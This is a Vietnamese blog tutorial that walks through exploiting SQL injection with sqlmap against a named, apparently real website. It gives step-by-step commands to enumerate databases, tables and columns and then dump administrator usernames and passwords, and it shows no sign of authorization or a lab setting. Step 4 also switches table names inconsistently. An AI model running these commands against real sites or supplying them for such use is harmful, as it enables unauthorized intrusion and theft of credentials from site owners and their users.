[ SQL ] Hướng Dẫn Khai Thác Sql Injection Bằng SQLMAP
Theo dõi Ngô Hùng Chiều để nhận nhiều thủ thuật hay, hữu ích nhé!
Dụng cụ :
- Python + Sqlmap.py
- Victim !!!
Khởi động nhé !!!
- sqlmap.py -h ( hoặc --help nhé !! ) để vào cửa sổ console nhé !
Bắt đầu nhé !
- Bước 1 : Chúng ta sẽ check database
+ Lệnh : sqlmap.py -u http://satthepducthinh.com/chitietsanpham.php?id=15 --dbs
- u = đường dẫn url
- dbs = Liệt kê databases
và nó sẽ ra như thế này : ví dụ :
+ Theo hình ở trên thì cái dbs là " unecuae_unec " nhé !!! còn cái information_schema thì kệ nó đi khi gặp nó nhé !!!
- Bước 2 : Tiếp theo sẽ check tables của site nhé !!!
+ Lệnh : sqlmap.py -u http://satthepducthinh.com/chitietsanpham.php?id=15 -D unecuae_unec --tables
- -D = DBMS liệt kê dữ liệu
- --tables = liệt kê cái gì thì các bạn tự tìm hiểu hén.....
và nó sẽ ra như thế này : ví dụ :
Sau khi tìm thấy một cái bảng liệt kê " tables " chúng ta tiếp tục dụng lệnh để tìm ra admin của site nhé !!!
- Bước 3 : Tiếp theo sẽ check columns của tables nhé !!! ( nhìn trên bảng chúng ta kiếm mấy cái liên quan đến tài khoản nhé !!! và ở đây là admin )
+ Lệnh : sqlmap.py -u http://satthepducthinh.com/chitietsanpham.php?id=15 -D unecuae_unec -T admin --columns
- -T = DBMS lệnh lệt kê dữ liệu
- --columns = liệt kê cái gì thì các bạn tự tìm hiểu hén.....
Ở đây các bạn sẽ check được column của tables " admin nhé !!! giờ dùng lệnh típ để show hàng hoy !!
- Bước 4 : Bước cuối cùng nhé , giờ mình sẽ show hàng ra nka !!!
+ Lệnh : sqlmap -u http://satthepducthinh.com/chitietsanpham.php?id=15 -D unecuae_unec -T user -C user_username,user_password --dump
Kết thúc
Copyright © 2018
THAM GIA TRANH TOP BÌNH LUẬN NGAY!
Một số lưu ý khi bình loạn
Mọi bình luận sai nội quy sẽ bị xóa mà không cần báo trước (xem nội quy).
Bấm Thông báo cho tôi bên dưới khung bình luận để nhận thông báo khi admin trả lời.
Bạn có thể dùng ảnh động hoặc mã hóa code HTML để bình luận.